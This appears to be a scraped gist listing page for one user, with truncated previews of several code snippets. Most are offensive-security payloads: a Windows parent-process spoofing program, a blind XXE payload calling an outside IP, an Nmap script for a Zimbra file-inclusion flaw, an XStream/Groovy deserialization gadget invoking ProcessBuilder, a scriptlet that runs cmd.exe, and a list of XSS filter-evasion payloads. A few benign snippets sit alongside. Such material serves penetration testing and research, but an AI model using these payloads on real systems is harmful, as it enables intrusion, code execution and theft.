JohnTroony

#!/usr/bin/python

# John (Troon) Ombagi
# jayombagi@gmail.com 

# PR(n, k) = n^k   ----> Permutation with repetition.

import itertools
import sys

JohnTroony

I have done some preliminary research into this bug and so far it does not seem like a backdoor. Just some really weird logic when handling routes, and rendering templates.

As to why widgetConfig[code] executes via a POST request, it is because of the following code located in /includes/vb5/frontend/applicationlight.php


$serverData = array_merge($_GET, $_POST);

if (!empty($this->application['handler']) AND method_exists($this, $this->application['handler']))
{
    $app = $this->application['handler'];

JohnTroony

[global_config]
  enabled_plugins = TerminalShot, LaunchpadCodeURLHandler, APTURLHandler, LaunchpadBugURLHandler
[keybindings]
[profiles]
  [[default]]
    background_darkness = 0.83
    background_type = transparent
    cursor_color = "#aaaaaa"
    show_titlebar = False
    scrollback_infinite = True

JohnTroony

/* x86-64-w64-mingw32-gcc process_spoof.c -o spoof.exe */
/* spoof.exe explorer.exe calc.exe */
#include <windows.h>
#include <tlhelp32.h>

#define PROC_THREAD_ATTRIBUTE_PARENT_PROCESS 0x00020000

typedef struct _STARTUPINFOEX {
  STARTUPINFO                 StartupInfo;
  LPPROC_THREAD_ATTRIBUTE_LIST lpAttributeList;

JohnTroony

--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

JohnTroony

local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
local vulns = require "vulns"

description = [[
A 0 day was been released on the 6th december 2013 by rubina119, and was patched in Zimbra 7.2.6.

The vulnerability is a local file inclusion that can retrieve any file from the server.

JohnTroony

// Compile with -std=c11

#include <stdlib.h>
#include <stdarg.h>
#include <stdio.h>
#include <inttypes.h>
#include <string.h>
#include <limits.h>

#define MAX_STR_LEN 4095

JohnTroony

<map>
  <entry>
    <groovy.util.Expando>
      <expandoProperties>
        <entry>
          <string>hashCode</string>
          <org.codehaus.groovy.runtime.MethodClosure>
            <delegate class="groovy.util.Expando" reference="../../../.."/>
            <owner class="java.lang.ProcessBuilder">
              <command>

JohnTroony

<?XML version="1.0"?>
<scriptlet>
<registration 
    progid="Empire"
    classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<script language="JScript">
		<![CDATA[
	
			var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");	

JohnTroony

<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>        
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>